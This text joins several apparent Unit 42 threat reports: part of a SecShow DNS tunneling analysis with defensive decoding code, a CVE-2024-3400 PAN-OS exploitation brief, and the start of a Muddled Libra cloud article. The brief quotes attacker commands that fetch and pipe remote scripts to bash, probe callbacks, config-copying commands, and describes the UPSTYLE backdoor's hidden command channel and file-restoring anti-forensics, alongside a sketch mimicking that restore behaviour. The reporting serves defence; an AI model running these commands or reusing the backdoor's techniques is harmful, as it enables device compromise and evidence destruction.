secshow[.]online | 1-103-170-192-121-103-170-192-9.f.secshow[.]online | ns.secshow[.]online. | 202.112.47[.]45 | Nov. 5, 2023
secdns[.]site | 0-53aa2a46-202401201-ans-dnssec.l-test.secdns[.]site | ns1.l-test.secdns[.]site., ns2.l-test.secdns[.]site. | 202.112.47[.]45 | Dec. 13, 2023

Table 3. The list of the domains used in the SecShow campaign.

SecShow Tunneling Use

SecShow uses different subdomain values for different scanning purposes. Here, we present four use cases to show how attackers scan the networks.

Case 1: bc2874fb-1.c.secshow[.]net

In this FQDN, bc2874fb is a hexadecimal encoding for IP address 188.40.116[.]251 and -1 is a counter to make the FQDN unique while the nameserver domain is c.secshow[.]net.

Attackers first spoof a random source IP address (e.g., 188.40.116[.]251) and make a DNS query to a candidate IP address for the encoded FQDN (bc2874fb-1.c.secshow[.]net). Once the attackers’ authoritative nameserver (c.secshow[.]net) receives a DNS query, they can obtain the incoming resolver’s IP address and the encoded source IP address used for this query.

Attackers repeat this process with different spoofed IP addresses and discover the open resolvers in the networks and the IP addresses that these open resolvers service. This can be the first step for DNS spoofing, DNS cache poisoning or DNS amplification attacks.
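
The Case 1 payload can be decoded with a few lines of Python, which is handy when triaging such queries in DNS logs. This is a minimal sketch based only on the label format described above. The function name decode_case1 is hypothetical.

```python
import ipaddress


def decode_case1(fqdn: str):
    """Split a label such as 'bc2874fb-1' into (encoded IPv4 address, counter)."""
    label = fqdn.split(".", 1)[0]            # first label carries the payload
    hex_ip, counter = label.split("-", 1)
    ip = ipaddress.IPv4Address(bytes.fromhex(hex_ip))  # 4 bytes, network order
    return str(ip), int(counter)


print(decode_case1("bc2874fb-1.c.secshow[.]net"))  # ('188.40.116.251', 1)
```

Comparing the decoded address with the actual source of the query at the authoritative nameserver is what lets the operator tell which resolver answered on behalf of the spoofed address.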

Case 2: 20240212190003.bailiwick.secshow[.]net

This FQDN type only appears every Monday at 19:00:03 UTC. The payload indicates a timestamp (e.g., on Feb. 12, 2024, at 19:00:03 UTC) that is the generation time for this FQDN.
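
The timestamp label can be parsed directly to confirm the weekly pattern. This is a small sketch assuming the YYYYMMDDhhmmss layout implied by the example. The function name parse_case2 is hypothetical.

```python
from datetime import datetime, timezone


def parse_case2(fqdn: str) -> datetime:
    """Parse the leading timestamp label of a Case 2 FQDN as a UTC datetime."""
    label = fqdn.split(".", 1)[0]
    return datetime.strptime(label, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


ts = parse_case2("20240212190003.bailiwick.secshow[.]net")
print(ts.isoformat(), ts.weekday())  # weekday() returns 0 for Monday
```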

Attackers spoof a source IP address and query this FQDN from a resolver IP address. Attackers can perform the following activities:

  • Test the query delays for this resolver
  • Check whether their domain is blocked and the query is forwarded to a sinkhole
  • Exploit the vulnerabilities of this resolver

Attackers achieve the first two objectives by analyzing logs from their authoritative nameserver. To exploit the vulnerabilities of the resolver, the response of this query contains an A record for another domain:

In the above code, afusdnfysbsf[.]com was a malicious domain that had been revoked. However, its record can still be cached by resolvers. Therefore, attackers might leverage some resolver’s cache vulnerabilities in older software versions (for example, CVE-2012-1033) to prevent domain name revocation.

Case 3: 1-103-170-192-121-103-170-192-9.h.secshow[.]net

The payload starts with a counter padding of 1 followed by two IP addresses of 103.170.192[.]121 and 103.170.192[.]9 that are the spoofed source IP address and the resolver's destination IP address.

This FQDN type is similar to Case 1. However, the A record of this FQDN is a random IP address that varies along with query attempts, with a long TTL of 86,400 seconds (24 hours). This feature could be exploited to perform the following activities:

  • DNS amplification distributed denial-of-service (DDoS) attacks
  • DNS cache poisoning attacks
  • Resource exhaustion attacks
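
The Case 3 label can be split into its counter and two dash-separated IPv4 addresses as follows. This is a minimal sketch based on the format described above. The function name parse_case3 is hypothetical.

```python
import ipaddress


def parse_case3(fqdn: str):
    """Return (counter, spoofed source IP, resolver IP) from a Case 3 FQDN."""
    parts = fqdn.split(".", 1)[0].split("-")
    if len(parts) != 9:
        raise ValueError("expected a counter followed by eight octets")
    counter = int(parts[0])
    # IPv4Address validates that each octet is in the 0-255 range.
    spoofed = str(ipaddress.IPv4Address(".".join(parts[1:5])))
    resolver = str(ipaddress.IPv4Address(".".join(parts[5:9])))
    return counter, spoofed, resolver


print(parse_case3("1-103-170-192-121-103-170-192-9.h.secshow[.]net"))
```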

Case 4: 0-53ea2a3a-202401201-ans-dnssec.l-test.secdns[.]site

The payload contains a pre-padding of 0 followed by a hex-encoded IP address (53ea2a3a), a date (20240120), and post-padding (1). We observe that attackers use this type of FQDN to obtain the following information:

  • Max/min TTL
  • Timeout
  • Query speed information

These are useful for some DNS threats such as Phoenix Domain [PDF] and Ghost Domain Names.
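
The Case 4 label can be broken into the fields described above. The sketch below assumes the third dash-separated field is an eight-digit date followed by the post-padding, and treats the remaining fields (ans, dnssec) as opaque tags whose meaning is not stated in this article. The function name parse_case4 is hypothetical.

```python
import ipaddress
from datetime import datetime


def parse_case4(fqdn: str) -> dict:
    """Split a Case 4 label into pre-padding, IP, date, post-padding and tags."""
    label = fqdn.split(".", 1)[0]
    pre, hex_ip, stamp, *tags = label.split("-")
    return {
        "pre_padding": pre,
        "ip": str(ipaddress.IPv4Address(bytes.fromhex(hex_ip))),
        "date": datetime.strptime(stamp[:8], "%Y%m%d").date(),
        "post_padding": stamp[8:],
        "tags": tags,  # opaque to this sketch
    }


print(parse_case4("0-53ea2a3a-202401201-ans-dnssec.l-test.secdns[.]site"))
```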

Mitigation

The DNS tunneling domains used in these campaigns can be detected by Palo Alto Networks firewall products. However, we also suggest the following measures to reduce the attack surface of DNS resolvers.

  • Control the service range of resolvers to accept necessary queries only
  • Promptly update the resolver software version to protect against N-day vulnerabilities

Conclusion

DNS tunneling techniques can be leveraged by adversaries to perform various actions not normally associated with DNS tunneling. Despite the conventional impression that tunneling is used for C2 and VPN purposes, we also find that attackers can use DNS tunneling as a vehicle for victim activity tracking and network scanning.

Palo Alto Networks Next-Generation Firewall customers receive protections against malicious indicators (domain, IP address) mentioned in this article via Advanced URL Filtering and our DNS Security subscription services.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Domains used for DNS tunneling

  • 85hsyad6i2ngzp[.]com
  • 8egub9e7s6cz7n[.]com
  • 8jtuazcr548ajj[.]com
  • anrad9i7fb2twm[.]com
  • aucxjd8rrzh7xf[.]com
  • b5ba24k6xhxn7b[.]com
  • cgb488dixfxjw7[.]com
  • d6zeh4und3yjt9[.]com
  • epyujbhfhbs35j[.]com
  • hhmk9ixaw9p3ec[.]com
  • hjmpfsamfkj5m5[.]com
  • iszedim8xredu2[.]com
  • npknraafbisrs7[.]com
  • patycyfswg33nh[.]com
  • rhctiz9xijd4yc[.]com
  • sn9jxsrp23x63a[.]com
  • swh9cpz2xntuge[.]com
  • tp7djzjtcs6gm6[.]com
  • uxjxfg2ui8k5zk[.]com
  • wzbhk2ccghtshr[.]com
  • y43dkbzwar7cdt[.]com
  • ydxpwzhidexgny[.]com
  • z54zspih9h5588[.]com
  • 3yfr6hh9dd3[.]com
  • 4bs6hkaysxa[.]com
  • 66tye9kcnxi[.]com
  • 8kk68biiitj[.]com
  • 93dhmp7ipsp[.]com
  • api536yepwj[.]com
  • bb62sbtk3yi[.]com
  • cytceitft8g[.]com
  • dipgprjp8uu[.]com
  • ege6wf76eyp[.]com
  • f6kf5inmfmj[.]com
  • f6ywh2ud89u[.]com
  • h82c3stb3k5[.]com
  • hwa85y4icf5[.]com
  • ifjh5asi25f[.]com
  • m9y6dte7b9i[.]com
  • n98erejcf9t[.]com
  • rz53par3ux2[.]com
  • szd4hw4xdaj[.]com
  • wj9ii6rx7yd[.]com
  • wk7ckgiuc6i[.]com
  • secshow[.]net
  • secshow[.]online
  • secdns[.]site

IP addresses associated with this activity

  • 35.75.233[.]210
  • 202.112.47[.]45
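
The indicators above are defanged for safe publication. To match them against resolver or proxy logs, they first need to be converted back to their plain form. The sketch below shows one way to do that; the function names refang, load_indicators and matches_blocklist are hypothetical helpers, and the parent-domain matching is an assumption about how a defender might want to catch tunneling subdomains.

```python
def refang(indicator: str) -> str:
    """Convert a defanged indicator back to its plain form."""
    return (
        indicator.strip()
        .replace("[.]", ".")
        .replace("hxxp://", "http://")
        .replace("hxxps://", "https://")
    )


def load_indicators(lines):
    """Build a lowercase set of indicators from bulleted, defanged lines."""
    cleaned = set()
    for line in lines:
        value = line.strip().lstrip("•").strip()
        if value:
            cleaned.add(refang(value).lower())
    return cleaned


def matches_blocklist(hostname: str, blocklist) -> bool:
    """Return True if the hostname or any of its parent domains is listed."""
    labels = hostname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))
```

Matching on parent domains matters here because tunneling traffic carries its payload in subdomain labels, so the queried name is rarely identical to the listed domain.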

Additional Resources

Updated May 13, 2024, at 10:15 a.m. PT to correct Table 2 and 3. 

Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)

Executive Summary

This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.

Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.

A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access.

For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue. Additionally, episode 21 of the Unit 42 podcast Threat Vector covers the discovery, technical details and exploitation of the vulnerability.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third parties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit persistence techniques that survive resets and upgrades. We are not aware of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability at this time.

We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse.

The section Current Scope of the Attack includes information on the types of exploitation activity we have seen, as well as their relative prevalence. The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability, along with some compromises of PAN-OS that were limited to confirming that the device is exploitable.

Other cases have included the following activity:

  • Limited attempts in which a file on the hard drive has been copied to a location accessible via a web request
  • A very limited number of compromises that led to interactive command execution

This threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will share guidance to mitigate the vulnerability, though readers should also refer to the Security Advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available.

If you believe your firewall has been compromised, please reach out to Palo Alto Networks support.

This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases are also available. Additional guidance on mitigation for customers is available in the Security Advisory.

A Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.

As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity.

We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.

Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:

Customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat ID 95187, 95189 and 95191 (available in Applications and Threats content version 8836-8695 and later). Our advisory has been updated with new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.

To apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information.

The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE.

Vulnerabilities Discussed CVE-2024-3400

Details of the Vulnerability

A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). 

Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.

Current Scope of the Attack

Palo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all cases we recommend following the guidance in the Security Advisory.

Level 0: Probe – An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the customer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely little to no immediate impact of a Level 0 attempt.

Level 1: Test – The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the firewall. However, there is no indication of any known unauthorized command execution.

Level 2: Potential Exfiltration – A file on the device has been copied to a location accessible via a web request, though the file may or may not have been subsequently downloaded. Typically, the file we have observed being copied is running_config.xml.

Level 3: Interactive Access – There are signs of interactive command execution. This may include shell-based backdoors, introduction of code, downloading files or running commands.

It is important to note that the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some Level 1 compromises of PAN-OS. Other cases have included limited Level 2 and very limited Level 3 compromises of those targeted firewalls.

UPSTYLE and Cron Job Backdoor Activity

As part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands on the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE.

We believe the threat actors created UPSTYLE specifically for this campaign. However, the threat actors were unsuccessful at installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install a cron job backdoor to carry out their post-exploitation activities.

After failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of commands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files.

The following IP address, which we believe belongs to a VPN used by the threat actor, was seen attempting to access a specific configuration file copied to this folder:

  • 66.235.168[.]222

After gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive additional commands from an external server in the form of a bash script:

  • wget -qO- hxxp://172.233.228[.]93/patch|bash

We were unable to access the bash script hosted at this URL. However, shortly after we saw evidence of the creation of a cron job. This cron job would run every minute to access commands hosted on the same external server that would execute via bash, as seen in the following command:

  • wget -qO- hxxp://172.233.228[.]93/policy | bash

We were unable to access the commands executed via this URL, but we believe this cron job-based backdoor was used to carry out the actor’s post-exploitation activities.
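
Defenders reviewing a device or host for this kind of persistence can look for scheduled entries that pipe a downloader straight into a shell. The following is a rough heuristic sketch, not a Palo Alto Networks detection; the pattern, the function name suspicious_cron_lines and the sample crontab content are assumptions chosen for illustration.

```python
import re

# Heuristic: wget or curl whose output is piped directly into a shell.
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|\n]*\|\s*(ba|z|da)?sh\b")


def suspicious_cron_lines(crontab_text: str):
    """Return crontab entries that download content and pipe it to a shell."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        # Skip blank lines and comments.
        if not stripped or stripped.startswith("#"):
            continue
        if PIPE_TO_SHELL.search(stripped):
            hits.append(stripped)
    return hits
```

A pattern like this will also flag legitimate installer one-liners, so hits are a starting point for review rather than proof of compromise.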

While the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this campaign and planned on using it as the initial backdoor. Also, the reasons the actors failed to install UPSTYLE included mistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. While we have not seen UPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other devices.

As previously mentioned, the threat actors made three unsuccessful exploit attempts to run commands to install UPSTYLE. For two of these attempts, UPSTYLE was hosted at hxxp://144.172.79[.]92/update.py.

In the third exploit attempt, we saw the actor hosting the backdoor at nhdata.s3-us-west-2.amazonaws[.]com, which may suggest that the actors thought network-based protections caused the first two failed installation attempts. According to the HTTP headers returned by the server, it appears that the threat actor last modified UPSTYLE hosted at 144.172.79[.]92 on April 7, 2024.

The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.

First, update.py writes another Python script to the following location:

  • [snip]/site-packages/system.pth

The Python script written to system.pth Base64-decodes an embedded Python script and executes it. This embedded Python script has two functions named protect and check, which are called in that order.

The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running another Base64 embedded Python script, which is the functional backdoor.

The Python script run by system.pth has a function named __main that will run in a thread. This function first reads the contents of the following file, along with its access and modified times:

  • [snip]/css/bootstrap.min.css

It then enters an infinite loop that iterates once every two seconds, reading in the following file:

  • [snip]/sslvpn_ngx_error.log

The script will then iterate through each line of the file and search the line for the threat actor's command using the following regular expression:

  • img\[([a-zA-Z0-9+/=]+)\]

If the above regular expression matches, the script will Base64-decode the contents of the command and run it using the popen method within Python's os module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which essentially prunes the lines that contain commands so they do not persist in the sslvpn_ngx_error.log file for later analysis.
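
For analysts working from a preserved copy of the log, the matching and pruning logic can be reproduced without executing anything. The sketch below uses the regular expression quoted above and assumes the captured group is a Base64-encoded command; the function name split_log_lines and the handling of undecodable matches are assumptions made for this illustration.

```python
import base64
import binascii
import re

# Regular expression quoted in the analysis above.
COMMAND_PATTERN = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")


def split_log_lines(lines):
    """Separate log lines into decoded commands and lines that would be kept.

    Commands are only decoded for review; nothing is executed.
    """
    commands, kept = [], []
    for line in lines:
        match = COMMAND_PATTERN.search(line)
        if match is None:
            # Non-matching lines are the ones written back to the log.
            kept.append(line)
            continue
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            commands.append(raw.decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            # Assumption: record undecodable matches instead of dropping them.
            commands.append(None)
    return commands, kept
```

Running this against log lines captured before the backdoor pruned them gives a list of the commands the actor attempted, alongside the lines that would have remained in the file.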

After running the command, the script writes the output of the command to the following file:

  • [snip]/css/bootstrap.min.css

The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file. It then sets the access and modified times back to their original values.

The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.
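
The overwrite-then-restore behavior described above can be sketched as follows to help responders understand what evidence it leaves behind. This is an illustrative reconstruction from the description, not the backdoor's code; the function name write_then_restore and its parameters are hypothetical, and the delay is configurable only so the behavior can be observed quickly in a lab.

```python
import os
import threading
import time


def write_then_restore(path, temporary_content: bytes, delay_seconds: float = 15.0):
    """Temporarily replace a file's content, then restore content and timestamps."""
    # Capture timestamps before reading, since reading can update the access time.
    stat = os.stat(path)
    original_times = (stat.st_atime_ns, stat.st_mtime_ns)
    with open(path, "rb") as handle:
        original_content = handle.read()

    with open(path, "wb") as handle:
        handle.write(temporary_content)

    def restore():
        time.sleep(delay_seconds)
        with open(path, "wb") as handle:
            handle.write(original_content)
        # Reset access and modified times to the values captured earlier.
        os.utime(path, ns=original_times)

    worker = threading.Thread(target=restore)
    worker.start()
    return worker
```

On POSIX systems, the inode change time (ctime) is still updated by these writes and by the timestamp reset itself, so restoring the access and modified times does not fully conceal that the file was touched.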

The use of legitimate log files to receive commands and a legitimate CSS file to exfiltrate the command results suggests that the threat actors developed this backdoor specifically to run on a compromised firewall.

Guidance

We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. 

Please see the frequently updated Palo Alto Networks Security Advisory on CVE-2024-3400 for information on hotfixes and the most current guidance for mitigating this vulnerability. A Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.

In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.

Additional Exploitation Observations

While continuing to monitor efforts, we have observed additional IP addresses attempting to exploit CVE-2024-3400 based on our Threat Prevention signature with Threat ID 95187.

We have not seen any relationships between these indicators and those associated with Operation MidnightEclipse. We associate the latter indicators exclusively with the activity involving exploitation of the zero-day vulnerability and the UPSTYLE backdoor.

As of writing this update, the following IP addresses have triggered the threat prevention signature:

  • 110.47.250[.]103
  • 126.227.76[.]24
  • 38.207.148[.]123
  • 147.45.70[.]100
  • 199.119.206[.]28
  • 38.181.70[.]3
  • 149.28.194[.]95
  • 78.141.232[.]174
  • 38.180.128[.]159
  • 64.176.226[.]203
  • 38.180.106[.]167
  • 173.255.223[.]159
  • 38.60.218[.]153
  • 185.108.105[.]110
  • 146.70.192[.]174
  • 149.88.27[.]212
  • 154.223.16[.]34
  • 38.180.41[.]251 
  • 203.160.86[.]91
  • 45.121.51[.]2

From our analysis, we do not see any additional activity from these IP addresses beyond probing the vulnerability to determine whether the firewall is either vulnerable or already compromised. We have seen the following commands within the exploit attempts that the threat prevention signature is blocking:

  • touch [snip]/global-protect/index.css
  • touch [snip]/global-protect/portal/css/test.min.css
  • cp [snip]/running-config.xml [snip]/global-protect/[16 random characters].css

The commands above show two examples of the use of the touch command to create an empty file in the web application folder. The client would then attempt to access this file via an HTTP request to determine if exploitation was successful. The third command shows a bit more malicious behavior, which involves copying the running configuration to the web application folder for access.
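
Because the touch-based probes leave empty files behind, one simple triage step on a collected file system image is to list zero-byte files under the web application folder. The sketch below assumes the caller supplies that folder, since the path is elided in this brief; the function name find_empty_files and the default .css suffix are illustrative choices.

```python
from pathlib import Path


def find_empty_files(root, suffix=".css"):
    """Return zero-byte files with the given suffix under root, sorted by path."""
    return sorted(
        path
        for path in Path(root).rglob(f"*{suffix}")
        if path.is_file() and path.stat().st_size == 0
    )
```

An empty file is only a lead. Legitimate placeholder files exist on many systems, so any hit should be compared against a known-good baseline for the same software version.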

We have also seen probing attempts that use either wget or curl to contact remote servers. An external party would use the resulting outbound HTTP request to confirm successful exploitation and command execution:

  • wget srgsd1f.842b727ba4.ipv6.1433.eu[.]org
  • wget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org
  • curl srgsdf.842b727ba4.ipv6.1433.eu[.]org
  • wget --no-check-certificate https://45.121.51[.]2/abc.txt

Conclusion

The Security Advisory will continue to provide up-to-date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation.

Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity's blog for their analysis.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Protections and mitigations for the observed exploitation activity are below and will be updated as more become available.

Palo Alto Networks Product Protections for CVE-2024-3400

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with Palo Alto Networks support.

Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention

Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signatures 95187, 95189 and 95191.

Cortex XDR, XSIAM and the Unified Cloud Agent 

Cortex XDR and XSIAM agents and analytics help protect against and detect post-exploitation activity if an attacker tries to enumerate or laterally move to other assets.

Cortex Xpanse and XSIAM ASM Module

Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.

Indicators of Compromise

UPSTYLE Backdoor

  • 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
  • 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure

  • 172.233.228[.]93
  • hxxp://172.233.228[.]93/policy
  • hxxp://172.233.228[.]93/patch
  • 66.235.168[.]222

Hosted Python Backdoor

  • 144.172.79[.]92
  • nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands

  • wget -qO- hxxp://172.233.228[.]93/patch|bash
  • wget -qO- hxxp://172.233.228[.]93/policy | bash
  • "failed to unmarshal session(.\+.\/" mp-log gpsvc.log* (Please see our Security Advisory for further information on this command.)

Additional Resources

Update Log

  • Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources.
  • Updated April 12, 2024, at 12:45 p.m. PT to add Cortex Xpanse product protections.
  • Updated April 14, 2024, at 11:05 a.m. PT to clarify impact on GlobalProtect portal configurations.
  • Updated April 14, 2024, at 7:55 p.m. PT to reflect that hotfixes are in place and ETAs added in our Security Advisory for upcoming hotfixes.
  • Updated April 15, 2024, at 8:35 a.m. PT to update exploitation activity in Executive Summary.
  • Updated April 15, 2024, at 9:16 a.m. PT to update language on Threat ID 95187 in the Executive Summary, including information on firewalls managed by Panorama.
  • Updated April 16, 2024, at 7:45 a.m. PT to add Additional Exploitation Observations section with IoCs and commands.
  • Updated April 16, 2024, at 9:48 a.m. PT to remove update.py filename from list of indicators.
  • Updated April 16, 2024, at 2:00 p.m. PT to update the Executive Summary and Mitigations section to add new mitigation guidance, a new Threat Prevention signature and availability of PAN-OS fixes.
  • Updated April 16, 2024, at 2:40 p.m. PT to align the Executive Summary and Details of the Vulnerability sections more closely to the Security Advisory.
  • Updated April 17, 2024, at 6:15 a.m. PT to add Threat ID 95191.
  • Updated April 17, 2024, at 11:30 a.m. PT to add an additional bullet to the Observed Commands subsection.
  • Updated April 17, 2024, at 12:23 p.m. PT to clarify contact information.
  • Updated April 19, 2024, at 12:45 p.m. PT to heavily revise the Current Scope of Attack section as well as the section on Operation MidnightEclipse activity (UPSTYLE and Cron Job Backdoor Activity).
  • Updated April 22, 2024, at 3:15 p.m. PT to more thoroughly define the levels of activity seen in the Current Scope of the Attack section.
  • Updated April 23, 2024, at 7:40 a.m. PT to add language to recommendations for Level 2 and Level 3 in Scope of Attack section. Clarified language in Guidance section. Added Update Log section.
  • Updated April 24, 2024, at 7:10 a.m. PT to include a link to a Customer Support Portal Knowledge Base article.
  • Updated April 24, 2024, at 6:15 p.m. PT to include updated XQL queries for hits for known IoCs in NGFW traffic and in XDR telemetry and NGFW telemetry.
  • Updated April 25, 2024, at 8:00 a.m. PT to add Knowledge Base article to Additional Resources.
  • Updated April 26, 2024, at 12:22 p.m. PT for clarity and consistency.
  • Updated April 29, 2024, at 6:52 a.m. PT to add Unit 42 Threat Vector podcast on the vulnerability to Additional Resources.
  • Updated April 29, 2024, at 11:55 a.m. PT to update exploitation status about proof of concept by third parties of post-exploit persistence techniques.
  • Updated May 1, 2024, at 8:05 a.m. PT for clarity and consistency.
  • Updated May 3, 2024, at 7:25 a.m. PT to note additional mitigation information for customers was added to the Security Advisory.
  • Updated May 20, 2024, at 8:10 a.m. PT to adjust second threat hunting query.

Muddled Libra’s Evolution to the Cloud

Executive Summary

Unit 42 researchers have discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments. Organizations often store a variety of data in SaaS applications and use services from CSPs. The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work.

Muddled Libra also uses the legitimate scalability and native functionality of CSP services to create new resources to assist with data exfiltration. All CSPs have terms of service (TOS) policies that explicitly prohibit activities like those performed by Muddled Libra.

This article covers the following:

  • Various access methodologies that are used for SaaS environments and CSPs
  • Common exploits
  • Data reconnaissance
  • Tactics to abuse CSP services for data exfiltration

All these methods follow a detectable pattern and mitigations can be implemented based on these patterns to protect an organization. With environments evolving to use more SaaS applications and a variety of CSPs, organizations need additional protections to secure their resources and those listed below can help protect them.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud provides detection, alerting and mitigation operations across several components within multicloud and hybrid environments.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Amazon Web Services (AWS) and Azure customers are protected from the threats discussed through the following services:

Related Unit 42 Topics Muddled Libra

Access Methodology

As part of Muddled Libra’s tactics evolution, they start by performing reconnaissance to identify administrative users to target for their initial access when social engineering the help desk. This development was first observed late in 2023 and we have seen activity as recent as January 2024. Muddled Libra also performs extensive research to uncover information about what applications are deployed and what CSPs an organization uses.

Figure 1 illustrates the actions that fall under the MITRE ATT&CK framework for reconnaissance. We will continue to use the framework as we discuss the tactics, techniques and procedures (TTPs) of Muddled Libra.

Image 1. Reconnaissance. Identify administrative users. Profile target organization for application usage.
Figure 1. Muddled Libra’s reconnaissance steps.

Muddled Libra purposefully targets administrative users during their social engineering attacks since those users have elevated permissions within identity providers, SaaS applications and organizations’ various CSP environments. After initial access, the group exploits identity providers to perform privilege escalation, by bypassing IAM restrictions and modifying permission sets associated with users to increase their scope of access.

